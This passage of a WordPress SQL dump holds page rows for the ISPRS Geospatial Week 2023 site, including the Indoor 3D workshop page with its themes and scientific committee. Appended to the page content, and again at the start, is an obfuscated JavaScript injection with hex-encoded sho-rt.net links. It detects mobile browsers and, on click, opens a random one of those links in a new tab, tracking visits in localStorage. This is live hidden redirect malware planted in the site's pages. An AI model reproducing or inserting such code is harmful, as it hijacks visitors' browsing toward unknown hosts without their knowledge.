_0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2023-02-05 14:50:25','2023-02-05 14:50:25','',3452,'https://gsw2023.com/?p=3852',0,'revision','',0),
(3853,1,'2023-02-05 14:55:40','2023-02-05 14:55:40','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Indoor 3D</span></strong></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n<li>\n<h6>Jesús Balado Frías, University of Vigo<u></u></h6>\n</li>\n<li>\n<h6>Bruno Vallet, LASTIG, IGN-ENSG<u></u></h6>\n</li>\n<li>\n<h6>Laurent Caraffa, The LASTIG lab<u></u></h6>\n</li>\n<li>\n<h6>Florent Geniet, The LASTIG lab<u></u></h6>\n</li>\n<li>\n<h6>Grégoire Grzeczkowicz, The LASTIG lab</h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Selected papers:</u><u></u><u></u></h5>\n<h5>After the event, the authors of selected papers will be invited to submit the extended versions of their papers to the PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"color: blue;\" href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">https://www.springer.com/<wbr />journal/41064</a><a href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">)</a>; current impact factor: 3.292).</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 